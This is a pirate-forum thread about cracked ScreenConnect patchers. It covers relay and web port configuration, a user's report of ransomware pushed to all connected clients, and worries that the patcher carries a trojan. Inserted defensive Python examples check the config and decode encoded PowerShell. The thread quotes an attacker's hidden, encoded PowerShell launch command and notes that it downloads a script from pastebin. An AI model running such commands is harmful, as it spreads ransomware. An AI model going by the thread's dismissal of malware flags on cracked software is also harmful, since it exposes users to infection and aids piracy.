SuprBay: The PirateBay Forum

Full Version: Arlecho's ScreenConnect 6 releases
(Jul 24, 2019, 20:41 pm)iscream Wrote: [ -> ]do i have to add those? The only one i see in there is

    <add key="WebServerListenUri" value="http://+:8040/" />
Yes you do have to add those. I found them listed on one of the old forum posts.
Copy mine and add your domain name. Make a backup of the config just in case it gets messed up.
OK, so I added them and I'm still only able to access it by specifying the port. Anyone have any other ideas?
(Jul 26, 2019, 13:47 pm)iscream Wrote: [ -> ]OK, so I added them and I'm still only able to access it by specifying the port. Anyone have any other ideas?
Sorry you will only be able to access it by specifying the port.
The default for HTTP is port 80 and the default for HTTPS is 443.
Anything other than those ports will have to be specified.

To be clear, my setup is HTTP only and looks like this.

Code:
    <add key="WebServerListenUri" value="http://+:80/" />
    <add key="WebServerAddressableUri" value="http://mywebsite.com:80" />
    <add key="RelayListenUri" value="relay://+:8080/" />
    <add key="RelayAddressableUri" value="relay://mywebsite.com:8080/" />
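As an added example (not from the thread or from ScreenConnect itself), a small checker for the four appSettings keys above. It verifies that each ListenUri/AddressableUri pair agrees on the port, that the advertised hostname is real, and it flags the two things the thread discusses: a plain-HTTP web server and a non-default port that every user has to type. The XML fragments are constructed.

```python
import xml.etree.ElementTree as ET
from urllib.parse import urlsplit

# Constructed appSettings fragment using the four keys from the post above
# (not a real deployment's web.config).
SAMPLE_SETTINGS = """<appSettings>
    <add key="WebServerListenUri" value="http://+:80/" />
    <add key="WebServerAddressableUri" value="http://mywebsite.com:80" />
    <add key="RelayListenUri" value="relay://+:8080/" />
    <add key="RelayAddressableUri" value="relay://mywebsite.com:8080/" />
</appSettings>"""

# Constructed variant of the original poster's situation: listening on 8040
# but advertising the bare domain, so the port has to be typed by hand.
MISMATCHED_SETTINGS = SAMPLE_SETTINGS.replace(
    "http://+:80/", "http://+:8040/").replace("mywebsite.com:80", "mywebsite.com")

DEFAULT_PORTS = {"http": 80, "https": 443}


def port_of(uri):
    """Explicit port of a URI, else the scheme default for http/https (else None)."""
    parts = urlsplit(uri)
    return parts.port if parts.port is not None else DEFAULT_PORTS.get(parts.scheme)


def check_settings(xml_text):
    """Return findings for the WebServer and Relay listen/addressable URI pairs."""
    settings = {e.get("key"): e.get("value") for e in ET.fromstring(xml_text).iter("add")}
    findings = []
    for prefix in ("WebServer", "Relay"):
        listen = settings.get(prefix + "ListenUri")
        public = settings.get(prefix + "AddressableUri")
        if not listen or not public:
            findings.append(f"{prefix}: ListenUri or AddressableUri missing")
            continue
        if port_of(listen) != port_of(public):
            findings.append(f"{prefix}: port mismatch, listening on {port_of(listen)} "
                            f"but advertising {port_of(public)}")
        if urlsplit(public).hostname in (None, "+", "*"):
            findings.append(f"{prefix}: AddressableUri needs a real hostname, not a wildcard")
    web = settings.get("WebServerListenUri", "")
    if urlsplit(web).scheme == "http":
        findings.append("WebServer: plain HTTP, logins and session data cross the "
                        "network unencrypted; use https on 443")
    if port_of(web) not in DEFAULT_PORTS.values():
        findings.append(f"WebServer: non-default port {port_of(web)}, users must type it")
    return findings
```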
(Jul 24, 2019, 20:01 pm)iscream Wrote: [ -> ]silly question but how do i get it available over wan not just internal on 8040?

To clarify, the domain is up already and I can see it, but only with mydomain:8040. I want mydomain.com to go straight to it. Ports are forwarded already.

(Jul 26, 2019, 14:33 pm)neweggeek Wrote: [ -> ]
(Jul 26, 2019, 13:47 pm)iscream Wrote: [ -> ]OK, so I added them and I'm still only able to access it by specifying the port. Anyone have any other ideas?
Sorry you will only be able to access it by specifying the port.
The default for HTTP is port 80 and the default for HTTPS is 443.
Anything other than those ports will have to be specified.

To be clear, my setup is HTTP only and looks like this.

Code:
    <add key="WebServerListenUri" value="http://+:80/" />
    <add key="WebServerAddressableUri" value="http://mywebsite.com:80" />
    <add key="RelayListenUri" value="relay://+:8080/" />
    <add key="RelayAddressableUri" value="relay://mywebsite.com:8080/" />

Thanks. IDK why, but for whatever reason this isn't working, even on port 80.
My ScreenConnect has been hacked and the hacker ran a command on all my connected clients.
This is the command that has been run:

cmd.exe /c START %SystemRoot%\system32\WindowsPowerShell\v1.0\powershell.exe -nop -w hidden -e [base64 payload removed]

All the files have been encrypted with some kind of ransomware.

How is this possible? Is ScreenConnect vulnerable to this kind of attack?
(Jul 31, 2019, 04:18 am)trex2002ro Wrote: [ -> ]My ScreenConnect has been hacked and the hacker ran a command on all my connected clients.
This is the command that has been run:
All the files have been encrypted with some kind of ransomware.

How is this possible? Is ScreenConnect vulnerable to this kind of attack?
If you got the command from the console or logs, they may have compromised the login. Are you using two-factor authentication, and are you using a strong password? Like $jNaF5DWp*m@3su#st
What do your activity logs show? Do you know which login was compromised?
Sorry for your loss. Try to figure out what happened and prevent that from happening next time.

That's a base64 encoded command.

It's running Invoke-NPZXGESCQANE after 1000000 seconds, or 11.5 days.
The file it's downloading is from pastebin.com /raw/ti9KqUs9.
Don't run the code unless you want more ransomware.
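As an added example (not code from the thread), a small Python triage helper for the kind of command line quoted above: it recognises the traits of that launch (hidden window, profile suppressed, -e) and decodes the -EncodedCommand payload, which PowerShell expects as base64 of UTF-16LE text, so a defender can read what a script does and pull out the URLs it references without executing it. The command lines, script and URL below are constructed; the real payload from the post is not reproduced.

```python
import base64
import re

# Constructed command lines for the demo. The encoded script only echoes a
# string and names a dummy URL; it is not the payload from the post.
_DEMO_SCRIPT = "Write-Output 'demo'; $u = 'http://example.invalid/raw/abc'"
_DEMO_ENCODED = base64.b64encode(_DEMO_SCRIPT.encode("utf-16-le")).decode("ascii")
SAMPLE_CMDLINES = [
    "cmd.exe /c START %SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.exe "
    "-nop -w hidden -e " + _DEMO_ENCODED,
    "powershell.exe -ExecutionPolicy RemoteSigned -File C:\\scripts\\backup.ps1",
]

# -e, -ec, -enc and -EncodedCommand all select the same switch.
ENC_FLAG = re.compile(r"^-(e|ec|enc|encodedcommand)$", re.IGNORECASE)


def decode_encoded_command(cmdline):
    """Return the script carried by -EncodedCommand (base64 of UTF-16LE), else None."""
    tokens = cmdline.split()
    for i, tok in enumerate(tokens[:-1]):
        if ENC_FLAG.match(tok):
            try:
                return base64.b64decode(tokens[i + 1], validate=True).decode("utf-16-le")
            except (ValueError, UnicodeDecodeError):
                return None
    return None


def triage(cmdline):
    """Collect the launch traits seen in the incident plus the decoded script, if any."""
    lower = cmdline.lower()
    traits = []
    if "powershell" in lower:
        traits.append("powershell launch")
    if re.search(r"-nop\b|-noprofile\b", lower):
        traits.append("profile suppressed (-nop)")
    if re.search(r"-w(indowstyle)?\s+hidden\b", lower):
        traits.append("hidden window")
    script = decode_encoded_command(cmdline)
    urls = []
    if script is not None:
        traits.append("encoded command")
        urls = re.findall(r"https?://[^\s'\"]+", script)
        if urls:
            traits.append("references a URL")
    return {"traits": traits, "script": script, "urls": urls}
```

Run over process-creation logs (Sysmon event 1 or Windows 4688 with command-line auditing), a hit with all four traits is worth an alert on its own.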
Hi Arlecho. First I want to thank you for your work, it really is appreciated.

However, I couldn't help but notice that several antivirus vendors detect your latest patcher as containing a trojan downloader (some claiming this to contain ransomware!). None of the older SC patchers that I've used over the years come up with any virus detections, false or otherwise. I'm well aware that many cracks get flagged as viruses, but no previous SC patcher (that I have) has ever been flagged.

https://www.virustotal.com/gui/file/59a9.../detection

Can you please share with us what tools you are using that might explain this (presumably) false positive virus detection, to give us some additional peace of mind? Can you verify that the distribution last posted has not been tampered with? Thanks again.
(Aug 01, 2019, 23:33 pm)safdcsfasdfgthh Wrote: [ -> ]Hi Arlecho. First I want to thank you for your work, it really is appreciated.

However, I couldn't help but notice that several antivirus vendors detect your latest patcher as containing a trojan downloader (some claiming this to contain ransomware!). None of the older SC patchers that I've used over the years come up with any virus detections, false or otherwise. I'm well aware that many cracks get flagged as viruses, but no previous SC patcher (that I have) has ever been flagged.

https://www.virustotal.com/gui/file/59a9.../detection

Can you please share with us what tools you are using that might explain this (presumably) false positive virus detection, to give us some additional peace of mind? Can you verify that the distribution last posted has not been tampered with? Thanks again.
I'm not much for reading code, but you're welcome to decompile the exe and attempt to see what it does. The file is designed with .NET 4.7.2, so use a .NET decompiler.
https://www.jetbrains.com/decompiler/
Probably just the missing certificate and included libraries; virus vendors block everything that might point to "cracks", "keygens" etc., probably to get a few bucks out of the software vendors. (As this version uses different patching libraries, that might also be it.)

If you don't trust it just decompile it or run it in a sandbox and verify that it doesn't do anything other than patch a few functions.
(Jul 31, 2019, 04:18 am)trex2002ro Wrote: [ -> ]My ScreenConnect has been hacked and the hacker ran a command on all my connected clients.
This is the command that has been run:

cmd.exe /c START %SystemRoot%\system32\WindowsPowerShell\v1.0\powershell.exe -nop -w hidden -e [base64 payload removed]

All the files have been encrypted with some kind of ransomware.

How is this possible? Is ScreenConnect vulnerable to this kind of attack?
This is not the first time I've seen this. Last 31/July one installation of ScreenConnect (v19.0) was attacked and all of its customers were infected with ransomware; the options "join with options" (to backstage) and "run command on remote system" should be password protected (I guess they are using those options to infect all the connected PCs).

A bit scared with this...